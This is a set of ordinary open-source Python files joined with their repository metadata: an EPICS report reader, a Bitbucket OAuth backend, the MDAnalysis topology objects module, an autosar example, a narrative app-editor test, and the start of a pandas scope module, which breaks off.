self.report, self.idx, self.attrib = src.split('.',2)
self.idx = int(self.idx)
self.R = BPLReport.reports[self.report]
self.allowScan = self.R.scan.add
self.process = getattr(self, 'process_'+opname)
def detach(self, rec):
pass
def process_fetch_float(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = float(str(R[self.idx][self.attrib]).translate(None,','))
except KeyError:
pass
else:
invalid = False
rec.UDF = invalid
rec.setTime(self.R.result_time)
def process_fetch_int(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = int(R[self.idx][self.attrib])
except KeyError:
pass
else:
invalid = False
rec.UDF = invalid
rec.setTime(self.R.result_time)
def process_fetch_string(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = R[self.idx][self.attrib].encode('ascii')
except KeyError:
pass
else:
invalid = False
if invalid:
rec.setSevr() # default is INVALID_ALARM
rec.setTime(self.R.result_time)
def process_fetch_length(self, rec, reason=None):
if self.R.result is not None:
rec.VAL = len(self.R.result)
rec.UDF = self.R.result is None
rec.setTime(self.R.result_time)
build = ReportItem
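# Minimal configuration sketch (editor's addition): reports are registered at
# import time through the 'add' alias above, before the worker thread starts.
# The name, URL and period here are placeholders, not values from the original
# deployment:
#
#     add('storage', 'http://example.invalid/bpl/storage.json', 10.0)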
|
mdavidsaver/pyDevSup
|
archApp/bplreport.py
|
Python
|
gpl-2.0
| 4,059
|
"""
Bitbucket OAuth support.
This adds support for Bitbucket OAuth service. An application must
be registered first on Bitbucket and the settings BITBUCKET_CONSUMER_KEY
and BITBUCKET_CONSUMER_SECRET must be defined with the corresponding
values.
By default username, email, token expiration time, first name and last name are
stored in extra_data field, check OAuthBackend class for details on how to
extend it.
"""
from __future__ import absolute_import
import simplejson
from social_auth.backends import ConsumerBasedOAuth, OAuthBackend
from social_auth.utils import dsa_urlopen
# Bitbucket configuration
BITBUCKET_SERVER = 'bitbucket.org/api/1.0'
BITBUCKET_REQUEST_TOKEN_URL = 'https://%s/oauth/request_token' % BITBUCKET_SERVER
BITBUCKET_ACCESS_TOKEN_URL = 'https://%s/oauth/access_token' % BITBUCKET_SERVER
BITBUCKET_AUTHORIZATION_URL = 'https://%s/oauth/authenticate' % BITBUCKET_SERVER
BITBUCKET_EMAIL_DATA_URL = 'https://%s/emails/' % BITBUCKET_SERVER
BITBUCKET_USER_DATA_URL = 'https://%s/users/' % BITBUCKET_SERVER
class BitbucketBackend(OAuthBackend):
"""Bitbucket OAuth authentication backend"""
name = 'bitbucket'
EXTRA_DATA = [
('username', 'username'),
('expires', 'expires'),
('email', 'email'),
('first_name', 'first_name'),
('last_name', 'last_name')
]
def get_user_details(self, response):
"""Return user details from Bitbucket account"""
return {'username': response.get('username'),
'email': response.get('email'),
'fullname': ' '.join((response.get('first_name'),
response.get('last_name'))),
'first_name': response.get('first_name'),
'last_name': response.get('last_name')}
def get_user_id(self, details, response):
"""Return the user id, Bitbucket only provides username as a unique
identifier"""
return response['username']
@classmethod
def tokens(cls, instance):
"""Return the tokens needed to authenticate the access to any API the
service might provide. Bitbucket uses a pair of OAuthToken consisting
on a oauth_token and oauth_token_secret.
instance must be a UserSocialAuth instance.
"""
token = super(BitbucketBackend, cls).tokens(instance)
if token and 'access_token' in token:
token = dict(
tok.split('=')
for tok in token['access_token'].split('&')
)
return token
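    # Example (editor's addition): tokens() splits Bitbucket's
    # querystring-style access_token into a dict, e.g.
    #     'oauth_token=abc&oauth_token_secret=xyz'
    #     -> {'oauth_token': 'abc', 'oauth_token_secret': 'xyz'}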
class BitbucketAuth(ConsumerBasedOAuth):
"""Bitbucket OAuth authentication mechanism"""
AUTHORIZATION_URL = BITBUCKET_AUTHORIZATION_URL
REQUEST_TOKEN_URL = BITBUCKET_REQUEST_TOKEN_URL
ACCESS_TOKEN_URL = BITBUCKET_ACCESS_TOKEN_URL
AUTH_BACKEND = BitbucketBackend
SETTINGS_KEY_NAME = 'BITBUCKET_CONSUMER_KEY'
SETTINGS_SECRET_NAME = 'BITBUCKET_CONSUMER_SECRET'
DEFAULT_SCOPE = ['webhook', 'repository', 'issue']
def user_data(self, access_token):
"""Return user data provided"""
# Bitbucket has a bit of an indirect route to obtain user data from an
# authenticated query: First obtain the user's email via an
# authenticated GET
url = BITBUCKET_EMAIL_DATA_URL
request = self.oauth_request(access_token, url)
response = self.fetch_response(request)
        try:
            # Then retrieve the user's primary email address or the top email
            email = None
            email_addresses = simplejson.loads(response)
            for email_address in reversed(email_addresses):
                if email_address['active']:
                    email = email_address['email']
                    if email_address['primary']:
                        break
            if email is None:  # no active address, so nothing further to fetch
                return None
            # Then return the user data using a normal GET with the
            # BITBUCKET_USER_DATA_URL and the user's email
            response = dsa_urlopen(BITBUCKET_USER_DATA_URL + email)
            user_details = simplejson.load(response)['user']
            user_details['email'] = email
            return user_details
        except ValueError:
            return None
# Backend definition
BACKENDS = {
'bitbucket': BitbucketAuth,
}
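# Example settings sketch (editor's addition). The values are placeholders;
# only the setting names are defined by this backend:
#
#     BITBUCKET_CONSUMER_KEY = '<consumer key from Bitbucket>'
#     BITBUCKET_CONSUMER_SECRET = '<consumer secret from Bitbucket>'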
|
looker/sentry
|
src/social_auth/backends/bitbucket.py
|
Python
|
bsd-3-clause
| 4,237
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Core Topology Objects --- :mod:`MDAnalysis.core.topologyobjects`
================================================================
The building blocks for MDAnalysis' description of topology
"""
from __future__ import print_function, absolute_import, division
from six.moves import zip
import numpy as np
import functools
from ..lib.mdamath import norm, dihedral
from ..lib.mdamath import angle as slowang
from ..lib.util import cached
from ..lib import util
from ..lib import distances
@functools.total_ordering
class TopologyObject(object):
"""Base class for all Topology items.
Defines the behaviour by which Bonds/Angles/etc in MDAnalysis should
behave.
.. versionadded:: 0.9.0
.. versionchanged:: 0.10.0
        All TopologyObjects now keep track of whether they were guessed or not
via the ``is_guessed`` managed property.
.. versionadded:: 0.11.0
Added the `value` method to return the size of the object
"""
__slots__ = ("_ix", "_u", "btype", "_bondtype", "_guessed", "order")
def __init__(self, ix, universe, type=None, guessed=False, order=None):
"""Create a topology object
Parameters
----------
ix : numpy array
indices of the Atoms
universe : MDAnalysis.Universe
type : optional
Type of the bond
guessed : optional
If the Bond is guessed
"""
self._ix = ix
self._u = universe
self._bondtype = type
self._guessed = guessed
self.order = order
@property
def atoms(self):
"""Atoms within this Bond"""
return self._u.atoms[self._ix]
@property
def indices(self):
"""Tuple of indices describing this object
.. versionadded:: 0.10.0
"""
return self._ix
@property
def universe(self):
return self._u
@property
def type(self):
"""Type of the bond as a tuple
Note
----
When comparing types, it is important to consider the reverse
of the type too, i.e.::
a.type == b.type or a.type == b.type[::-1]
"""
if self._bondtype is not None:
return self._bondtype
else:
return tuple(self.atoms.types)
@property
def is_guessed(self):
return bool(self._guessed)
def __hash__(self):
return hash((self._u, tuple(self.indices)))
def __repr__(self):
indices = sorted(self.indices)
return "<{cname} between: {conts}>".format(
cname=self.__class__.__name__,
conts=", ".join([
"Atom {0}".format(i)
for i in indices]))
def __contains__(self, other):
"""Check whether an atom is in this :class:`TopologyObject`"""
return other in self.atoms
def __eq__(self, other):
"""Check whether two bonds have identical contents"""
if not self.universe == other.universe:
return False
return (np.array_equal(self.indices, other.indices) or
np.array_equal(self.indices[::-1], other.indices))
def __ne__(self, other):
return not self == other
def __lt__(self, other):
return tuple(self.indices) < tuple(other.indices)
def __getitem__(self, item):
"""Can retrieve a given Atom from within"""
return self.atoms[item]
def __iter__(self):
return iter(self.atoms)
def __len__(self):
return len(self._ix)
class Bond(TopologyObject):
"""A bond between two :class:`~MDAnalysis.core.groups.Atom` instances.
Two :class:`Bond` instances can be compared with the ``==`` and
``!=`` operators. A bond is equal to another if the same atom
numbers are connected and they have the same bond order. The
ordering of the two atom numbers is ignored as is the fact that a
bond was guessed.
The presence of a particular atom can also be queried::
>>> Atom in Bond
will return either ``True`` or ``False``.
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`. Changed class to use
:attr:`__slots__` and stores atoms in :attr:`atoms` attribute.
"""
btype = 'bond'
def partner(self, atom):
"""Bond.partner(Atom)
Returns
-------
the other :class:`~MDAnalysis.core.groups.Atom` in this
bond
"""
if atom == self.atoms[0]:
return self.atoms[1]
elif atom == self.atoms[1]:
return self.atoms[0]
else:
raise ValueError("Unrecognised Atom")
def length(self, pbc=False):
"""Length of the bond.
.. versionchanged:: 0.11.0
Added pbc keyword
"""
if pbc:
box = self.universe.dimensions
return distances.self_distance_array(
np.array([self[0].position, self[1].position]),
box=box)[0]
else:
return norm(self[0].position - self[1].position)
value = length
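    # Example (editor's addition): for a Bond ``b`` joining atoms a1 and a2,
    # b.partner(a1) returns a2, b.length() returns the a1-a2 distance, and
    # b.value() is an alias for b.length().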
class Angle(TopologyObject):
"""An angle between three :class:`~MDAnalysis.core.groups.Atom` instances.
Atom 2 is the apex of the angle
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`; now uses
:attr:`__slots__` and stores atoms in :attr:`atoms` attribute
"""
btype = 'angle'
def angle(self):
"""Returns the angle in degrees of this Angle.
Angle between atoms 0 and 2 with apex at 1::
2
/
/
1------0
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
.. versionadded:: 0.9.0
"""
a = self[0].position - self[1].position
b = self[2].position - self[1].position
return np.rad2deg(
np.arccos(np.dot(a, b) / (norm(a) * norm(b))))
value = angle
class Dihedral(TopologyObject):
"""Dihedral (dihedral angle) between four
:class:`~MDAnalysis.core.groups.Atom` instances.
The dihedral is defined as the angle between the planes formed by
Atoms (1, 2, 3) and (2, 3, 4).
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`; now uses :attr:`__slots__`
and stores atoms in :attr:`atoms` attribute.
.. versionchanged:: 0.11.0
Renamed to Dihedral (was Torsion)
"""
# http://cbio.bmt.tue.nl/pumma/uploads/Theory/dihedral.png
btype = 'dihedral'
def dihedral(self):
"""Calculate the dihedral angle in degrees.
Dihedral angle around axis connecting atoms 1 and 2 (i.e. the angle
between the planes spanned by atoms (0,1,2) and (1,2,3))::
3
|
1-----2
/
0
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
.. versionadded:: 0.9.0
"""
A, B, C, D = self.atoms
ab = A.position - B.position
bc = B.position - C.position
cd = C.position - D.position
return np.rad2deg(dihedral(ab, bc, cd))
value = dihedral
# subclass Dihedral to inherit dihedral method
class ImproperDihedral(Dihedral):
"""
Improper Dihedral (improper dihedral angle) between four
:class:`~MDAnalysis.core.groups.Atom` instances.
MDAnalysis treats the improper dihedral angle as the angle between
the planes formed by Atoms (1, 2, 3) and (2, 3, 4).
.. warning:: Definitions of Atom ordering in improper dihedrals
can change. Check the definitions here against
your software.
.. versionadded:: 0.9.0
.. versionchanged:: 0.11.0
Renamed to ImproperDihedral (was Improper_Torsion)
"""
# http://cbio.bmt.tue.nl/pumma/uploads/Theory/improper.png
btype = 'improper'
def improper(self):
"""Improper dihedral angle in degrees.
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
"""
return self.dihedral()
class TopologyDict(object):
"""A customised dictionary designed for sorting the bonds, angles and
dihedrals present in a group of atoms.
Usage::
topologydict = TopologyDict(members)
Arguments
---------
*members*
A list of :class:`TopologyObject` instances
Returns
-------
*topologydict*
A specialised dictionary of the topology instances passed to it
TopologyDicts are also built lazily from a :class:`TopologyGroup.topDict`
attribute.
    The :class:`TopologyDict` collects all topology objects of the selected
    type from the atoms and categorises them according to the types of the atoms within. A
:class:`TopologyGroup` containing all of a given bond type can be made by
querying with the appropriate key. The keys to the :class:`TopologyDict`
are a tuple of the atom types that the bond represents and can be viewed
using the :meth:`keys` method.
For example, from a system containing pure ethanol ::
>>> td = u.bonds.topDict
>>> td.keys()
[('C', 'C'),
('C', 'H'),
('O', 'H'),
('C', 'O')]
>>> td['C', 'O']
< TopologyGroup containing 912 bonds >
.. Note::
The key for a bond is taken from the type attribute of the atoms.
Getting and setting types of bonds is done smartly, so a C-C-H
angle is considered identical to a H-C-C angle.
Duplicate entries are automatically removed upon creation and
combination of different Dicts. This means a bond between atoms
1 and 2 will only ever appear once in a dict despite both atoms 1
and 2 having the bond in their :attr:`bond` attribute.
Two :class:`TopologyDict` instances can be combined using
addition and it will not create any duplicate bonds in the process.
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Changed initialisation to use a list of :class:`TopologyObject`
instances instead of list of atoms; now used from within
:class:`TopologyGroup` instead of accessed from :class:`AtomGroup`.
"""
def __init__(self, topologygroup):
if not isinstance(topologygroup, TopologyGroup):
raise TypeError("Can only construct from TopologyGroup")
self.dict = dict()
self._u = topologygroup.universe
self.toptype = topologygroup.btype
for b in topologygroup:
btype = b.type
try:
self.dict[btype] += [b]
except KeyError:
self.dict[btype] = [b]
self._removeDupes()
def _removeDupes(self):
"""Sorts through contents and makes sure that there are
no duplicate keys (through type reversal)
"""
newdict = dict()
# Go through all keys, if the reverse of the key exists add this to
# that entry else make a new entry
for k in self.dict:
if not k[::-1] in newdict:
newdict[k] = self.dict[k]
else:
newdict[k[::-1]] += self.dict[k]
self.dict = newdict
@property
def universe(self):
return self._u
def __len__(self):
"""Returns the number of types of bond in the topology dictionary"""
return len(self.dict.keys())
def keys(self):
"""Returns a list of the different types of available bonds"""
return self.dict.keys()
def __iter__(self):
"""Iterator over keys in this dictionary"""
return iter(self.dict)
def __repr__(self):
return "<TopologyDict with {num} unique {type}s>".format(
num=len(self), type=self.toptype)
def __getitem__(self, key):
"""Returns a TopologyGroup matching the criteria if possible,
otherwise returns ``None``
"""
if key in self:
if key in self.dict:
selection = self.dict[key]
else:
selection = self.dict[key[::-1]]
bix = np.vstack([s.indices for s in selection])
return TopologyGroup(bix, self._u, btype=self.toptype)
else:
raise KeyError(key)
def __contains__(self, other):
"""
Returns boolean on whether a given type exists within this dictionary
For topology groups the key (1,2,3) is considered the same as (3,2,1)
"""
return other in self.dict or other[::-1] in self.dict
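    # Example (editor's addition): keys match in either direction, so
    # td[('H', 'C', 'C')] and td[('C', 'C', 'H')] return the same group.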
class TopologyGroup(object):
"""A container for a groups of bonds.
All bonds of a certain types can be retrieved from within the
:class:`TopologyGroup` by querying with a tuple of types::
tg2 = tg.select_bonds([key])
Where *key* describes the desired bond as a tuple of the involved
    :class:`~MDAnalysis.core.groups.Atom` types (as defined by the .type Atom
    attribute). A list of available keys can be displayed using the
:meth:`types` method.
Alternatively, all the bonds which are in a given
:class:`~MDAnalysis.core.groups.AtomGroup` can be extracted using
:meth:`atomgroup_intersection`::
tg2 = tg.atomgroup_intersection(ag)
This allows the keyword *strict* to be given, which forces all members of
all bonds to be inside the AtomGroup passed to it.
Finally, a TopologyGroup can be sliced similarly to AtomGroups::
tg2 = tg[5:10]
The :meth:`bonds`, :meth:`angles` and :meth:`dihedrals` methods offer
a "shortcut" to the Cython distance calculation functions in
:class:`MDAnalysis.lib.distances`.
    TopologyGroups can be combined with TopologyGroups of the same bond
    type (i.e. two angle-containing TopologyGroups can be combined).
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Overhauled completely: (1) Added internal :class:`TopologyDict`
accessible by the :attr:`topDict` attribute. (2)
:meth:`selectBonds` allows the :attr:`topDict` to be queried
with tuple of types. (3) Added :meth:`atomgroup_intersection`
to allow bonds which are in a given :class:`AtomGroup` to be retrieved.
.. versionchanged:: 0.10.0
Added :func:`from_indices` constructor, allowing class to be created
from indices.
Can now create empty Group.
Renamed :meth:`dump_contents` to :meth:`to_indices`
.. versionchanged:: 0.11.0
Added `values` method to return the size of each object in this group
Deprecated selectBonds method in favour of select_bonds
"""
_allowed_types = {'bond', 'angle', 'dihedral', 'improper'}
def __init__(self, bondidx, universe, btype=None, type=None, guessed=None,
order=None):
if btype is None:
# guess what I am
# difference between dihedral and improper
# not really important
self.btype = {2: 'bond',
3: 'angle',
4: 'dihedral'}[len(bondidx[0])]
elif btype in self._allowed_types:
self.btype = btype
else:
raise ValueError("Unsupported btype, use one of {}"
"".format(self._allowed_types))
nbonds = len(bondidx)
# remove duplicate bonds
if type is None:
type = np.repeat(None, nbonds).reshape(nbonds, 1)
if guessed is None:
guessed = np.repeat(True, nbonds).reshape(nbonds, 1)
elif guessed is True or guessed is False:
guessed = np.repeat(guessed, nbonds).reshape(nbonds, 1)
else:
guessed = np.asarray(guessed, dtype=np.bool).reshape(nbonds, 1)
if order is None:
order = np.repeat(None, nbonds).reshape(nbonds, 1)
# TODO: why has this been defined?
split_index = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
if nbonds > 0:
uniq, uniq_idx = util.unique_rows(bondidx, return_index=True)
self._bix = uniq
self._bondtypes = type[uniq_idx]
self._guessed = guessed[uniq_idx]
self._order = order[uniq_idx]
# Create vertical AtomGroups
self._ags = [universe.atoms[self._bix[:, i]]
for i in range(self._bix.shape[1])]
else:
# Empty TopologyGroup
self._bix = np.array([])
self._bondtypes = np.array([])
self._guessed = np.array([])
self._order = np.array([])
self._ags = []
self._u = universe
self._cache = dict() # used for topdict saving
@property
def universe(self):
"""The Universe that we belong to"""
return self._u
def select_bonds(self, selection):
"""Retrieves a selection from this topology group based on types.
        .. seealso:: :meth:`types`
        .. versionadded:: 0.9.0
"""
return self.topDict[selection]
selectBonds = select_bonds
def types(self):
"""Return a list of the bond types in this TopologyGroup
        .. versionadded:: 0.9.0
"""
return list(self.topDict.keys())
@property
@cached('dict')
def topDict(self):
"""
Returns the TopologyDict for this topology group.
This is used for the select_bonds method when fetching a certain type
of bond.
This is a cached property so will be generated the first time it is
accessed.
        .. versionadded:: 0.9.0
"""
return TopologyDict(self)
def atomgroup_intersection(self, ag, **kwargs):
"""Retrieve all bonds from within this TopologyGroup that are within
the AtomGroup which is passed.
Parameters
----------
        ag : AtomGroup
            The :class:`~MDAnalysis.core.groups.AtomGroup` to intersect
            with.
strict : bool
Only retrieve bonds which are completely contained within the
AtomGroup. [``False``]
.. versionadded:: 0.9.0
"""
# Issue #780 - if self is empty, return self to avoid invalid mask
if not self:
return self
# Strict requires all items in a row to be seen,
# otherwise any item in a row
func = np.all if kwargs.get('strict', False) else np.any
atom_idx = ag.indices
# Create a list of boolean arrays,
# each representing a column of bond indices.
seen = [np.in1d(col, atom_idx) for col in self._bix.T]
# Create final boolean mask by summing across rows
mask = func(seen, axis=0)
return self[mask]
@property
def indices(self):
"""all bond indices
See Also
--------
to_indices : function that just returns `indices`
"""
return self._bix
def to_indices(self):
"""Return a data structure with atom indices describing the bonds.
This format should be identical to the original contents of the
entries in universe._topology.
Note that because bonds are sorted as they are initialised, the order
that atoms are defined in each entry might be reversed.
Returns
-------
indices : tuple
A tuple of tuples which define the contents of this
TopologyGroup in terms of the atom numbers. (0 based
index within u.atoms)
.. versionadded:: 0.9.0
.. versionchanged:: 0.10.0
Renamed from "dump_contents" to "to_indices"
"""
return self.indices
dump_contents = to_indices
def __len__(self):
"""Number of bonds in the topology group"""
return self._bix.shape[0]
def __add__(self, other):
"""Combine two TopologyGroups together.
        Can combine two TopologyGroups of the same type, or add a single
TopologyObject to a TopologyGroup.
"""
# check addition is sane
if not isinstance(other, (TopologyObject, TopologyGroup)):
raise TypeError("Can only combine TopologyObject or "
"TopologyGroup to TopologyGroup, not {0}"
"".format(type(other)))
# cases where either other or self is empty TG
if not other: # adding empty TG to me
return self
if not self:
if isinstance(other, TopologyObject):
# Reshape indices to be 2d array
return TopologyGroup(other.indices[None, :],
other.universe,
btype=other.btype,
type=np.array([other._bondtype]),
guessed=np.array([other.is_guessed]),
order=np.array([other.order]),
)
else:
return TopologyGroup(other.indices,
other.universe,
btype=other.btype,
type=other._bondtypes,
guessed=other._guessed,
order=other._order,
)
else:
if not other.btype == self.btype:
raise TypeError("Cannot add different types of "
"TopologyObjects together")
if isinstance(other, TopologyObject):
# add TO to me
return TopologyGroup(
np.concatenate([self.indices, other.indices[None, :]]),
self.universe,
btype=self.btype,
type=np.concatenate([self._bondtypes,
np.array([other._bondtype])]),
guessed=np.concatenate([self._guessed,
np.array([[other.is_guessed]])]),
order=np.concatenate([self._order,
np.array([other.order])]),
)
else:
# add TG to me
return TopologyGroup(
np.concatenate([self.indices, other.indices]),
self.universe,
btype=self.btype,
type=np.concatenate([self._bondtypes, other._bondtypes]),
guessed=np.concatenate([self._guessed, other._guessed]),
order=np.concatenate([self._order, other._order]),
)
def __getitem__(self, item):
"""Returns a particular bond as single object or a subset of
this TopologyGroup as another TopologyGroup
.. versionchanged:: 0.10.0
Allows indexing via boolean numpy array
"""
# Grab a single Item, similar to Atom/AtomGroup relationship
if isinstance(item, int):
outclass = {'bond': Bond,
'angle': Angle,
'dihedral': Dihedral,
'improper': ImproperDihedral}[self.btype]
return outclass(self._bix[item],
self._u,
type=self._bondtypes[item],
guessed=self._guessed[item],
order=self._order[item])
else:
# Slice my index array with the item
return self.__class__(self._bix[item],
self._u,
btype=self.btype,
type=self._bondtypes[item],
guessed=self._guessed[item],
order=self._order[item],)
def __contains__(self, item):
"""Tests if this TopologyGroup contains a bond"""
return item.indices in self._bix
def __repr__(self):
return "<TopologyGroup containing {num} {type}s>".format(
num=len(self), type=self.btype)
def __eq__(self, other):
"""Test if contents of TopologyGroups are equal"""
return np.array_equal(self.indices, other.indices)
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return not len(self) == 0
@property
def atom1(self):
"""The first atom in each TopologyObject in this Group"""
return self._ags[0]
@property
def atom2(self):
"""The second atom in each TopologyObject in this Group"""
return self._ags[1]
@property
def atom3(self):
"""The third atom in each TopologyObject in this Group"""
try:
return self._ags[2]
except IndexError:
nvert = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
raise IndexError("TopologyGroup of {}s only has {} vertical AtomGroups"
"".format(self.btype, nvert))
@property
def atom4(self):
"""The fourth atom in each TopologyObject in this Group"""
try:
return self._ags[3]
except IndexError:
nvert = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
raise IndexError("TopologyGroup of {}s only has {} vertical AtomGroups"
"".format(self.btype, nvert))
# Distance calculation methods below
# "Slow" versions exist as a way of testing the Cython implementations
def values(self, **kwargs):
"""Return the size of each object in this Group
:Keywords:
*pbc*
apply periodic boundary conditions when calculating distance
[``False``]
*result*
allows a predefined results array to be used,
note that this will be overwritten
.. versionadded:: 0.11.0
"""
if self.btype == 'bond':
return self.bonds(**kwargs)
elif self.btype == 'angle':
return self.angles(**kwargs)
elif self.btype == 'dihedral':
return self.dihedrals(**kwargs)
elif self.btype == 'improper':
return self.dihedrals(**kwargs)
def _bondsSlow(self, pbc=False): # pragma: no cover
"""Slow version of bond (numpy implementation)"""
        if not self.btype == 'bond':
            raise TypeError("TopologyGroup is not of type 'bond'")
else:
bond_dist = self._ags[0].positions - self._ags[1].positions
if pbc:
box = self._ags[0].dimensions
                # orthorhombic (all angles at indices 3:6 are 90 deg) and
                # divide-by-zero check
                if (box[3:6] == 90.).all() and not (box[0:3] == 0).any():
                    bond_dist -= np.rint(bond_dist / box[0:3]) * box[0:3]
else:
raise ValueError("Only orthogonal boxes supported")
return np.array([norm(a) for a in bond_dist])
def bonds(self, pbc=False, result=None):
"""Calculates the distance between all bonds in this TopologyGroup
:Keywords:
*pbc*
apply periodic boundary conditions when calculating distance
[False]
*result*
allows a predefined results array to be used,
note that this will be overwritten
Uses cython implementation
"""
if not self.btype == 'bond':
raise TypeError("TopologyGroup is not of type 'bond'")
        if result is None:  # 'not result' would be ambiguous for a passed-in array
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_bonds(self._ags[0].positions,
self._ags[1].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_bonds(self._ags[0].positions,
self._ags[1].positions,
result=result)
def _anglesSlow(self): # pragma: no cover
"""Slow version of angle (numpy implementation)"""
if not self.btype == 'angle':
raise TypeError("TopologyGroup is not of type 'angle'")
vec1 = self._ags[0].positions - self._ags[1].positions
vec2 = self._ags[2].positions - self._ags[1].positions
angles = np.array([slowang(a, b) for a, b in zip(vec1, vec2)])
return angles
def angles(self, result=None, pbc=False):
"""Calculates the angle in radians formed between a bond
between atoms 1 and 2 and a bond between atoms 2 & 3
Parameters
----------
result : array_like
allows a predefined results array to be used, note that this
will be overwritten
pbc : bool
apply periodic boundary conditions when calculating angles
[``False``] this is important when connecting vectors between
atoms might require minimum image convention
Returns
-------
angles : ndarray
.. versionchanged :: 0.9.0
Added *pbc* option (default ``False``)
"""
if not self.btype == 'angle':
raise TypeError("TopologyGroup is not of type 'angle'")
        if result is None:  # 'not result' would be ambiguous for a passed-in array
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_angles(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_angles(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
result=result)
def _dihedralsSlow(self): # pragma: no cover
"""Slow version of dihedral (numpy implementation)"""
if self.btype not in ['dihedral', 'improper']:
raise TypeError("TopologyGroup is not of type 'dihedral' or "
"'improper'")
vec1 = self._ags[1].positions - self._ags[0].positions
vec2 = self._ags[2].positions - self._ags[1].positions
vec3 = self._ags[3].positions - self._ags[2].positions
return np.array([dihedral(a, b, c)
for a, b, c in zip(vec1, vec2, vec3)])
def dihedrals(self, result=None, pbc=False):
"""Calculate the dihedralal angle in radians for this topology
group.
Defined as the angle between a plane formed by atoms 1, 2 and
3 and a plane formed by atoms 2, 3 and 4.
Parameters
----------
result : array_like
allows a predefined results array to be used, note that this
will be overwritten
pbc : bool
apply periodic boundary conditions when calculating angles
[``False``] this is important when connecting vectors between
atoms might require minimum image convention
Returns
-------
angles : ndarray
.. versionchanged:: 0.9.0
Added *pbc* option (default ``False``)
"""
if self.btype not in ['dihedral', 'improper']:
raise TypeError("TopologyGroup is not of type 'dihedral' or "
"'improper'")
        if result is None:  # 'not result' would be ambiguous for a passed-in array
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_dihedrals(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
self._ags[3].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_dihedrals(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
self._ags[3].positions,
result=result)
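# Minimal usage sketch (editor's addition, not part of MDAnalysis itself).
# Given a Universe ``u`` that carries bond information, all C-H bond lengths
# can be obtained through the TopologyDict/TopologyGroup machinery above
# (file names are placeholders)::
#
#     import MDAnalysis as mda
#     u = mda.Universe('topol.psf', 'traj.dcd')
#     ch = u.bonds.topDict[('C', 'H')]   # TopologyGroup of all C-H bonds
#     lengths = ch.values()              # same as ch.bonds()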
|
kain88-de/mdanalysis
|
package/MDAnalysis/core/topologyobjects.py
|
Python
|
gpl-2.0
| 33,789
|
import autosar
ws = autosar.workspace(version="4.2.2")
ws.loadXML('DataTypes.arxml', roles = {
'/DataTypes': 'DataType',
'/DataTypes/CompuMethods': 'CompuMethod',
'/DataTypes/Units': 'Unit',
'/DataTypes/DataConstrs': 'DataConstraint'})
print(ws.roles)
|
cogu/autosar
|
doc/autosar4_guide/examples/setting_roles_on_load_xml.py
|
Python
|
mit
| 276
|
"""
Some tests for the App Editor module.
"""
import unittest
from biokbase.narrative.appeditor import (
generate_app_cell
)
import json
from util import TestConfig
class AppEditorTestCase(unittest.TestCase):
@classmethod
    def setUpClass(cls):
        config = TestConfig()
        cls.specs_list = config.load_json_file(config.get('specs', 'app_specs_file'))
        cls.spec_json = config.load_json_file(config.get('specs', 'simple_spec_json'))
        with open(config.file_path(config.get('specs', 'simple_display_yaml'))) as f:
            cls.display_yaml = f.read()
def test_gen_app_cell_post_validation(self):
js = generate_app_cell(validated_spec=self.specs_list[0])
self.assertIsNotNone(js)
def test_gen_app_cell_pre_valid(self):
js = generate_app_cell(spec_tuple=(json.dumps(self.spec_json), self.display_yaml))
self.assertIsNotNone(js)
def test_gen_app_cell_fail_validation(self):
with self.assertRaises(Exception):
generate_app_cell(spec_tuple=("{}", self.display_yaml))
|
jmchandonia/narrative
|
src/biokbase/narrative/tests/test_appeditor.py
|
Python
|
mit
| 1,090
|
"""
Module for scope operations
"""
import datetime
import inspect
import itertools
import pprint
import struct
import sys
import numpy as np
from pandas._libs.tslibs import Timestamp
from pandas.compat import DeepChainMap, StringIO, map
from pandas.core.base import StringMixin
import pandas.core.computation as compu
def _ensure_scope(level, global_dict=None, local_dict=None, resolvers=(),
target=None, **kwargs):
"""Ensure that we are grabbing the correct scope."""
return Scope(level + 1, global_dict=global_dict, local_dict=local_dict,
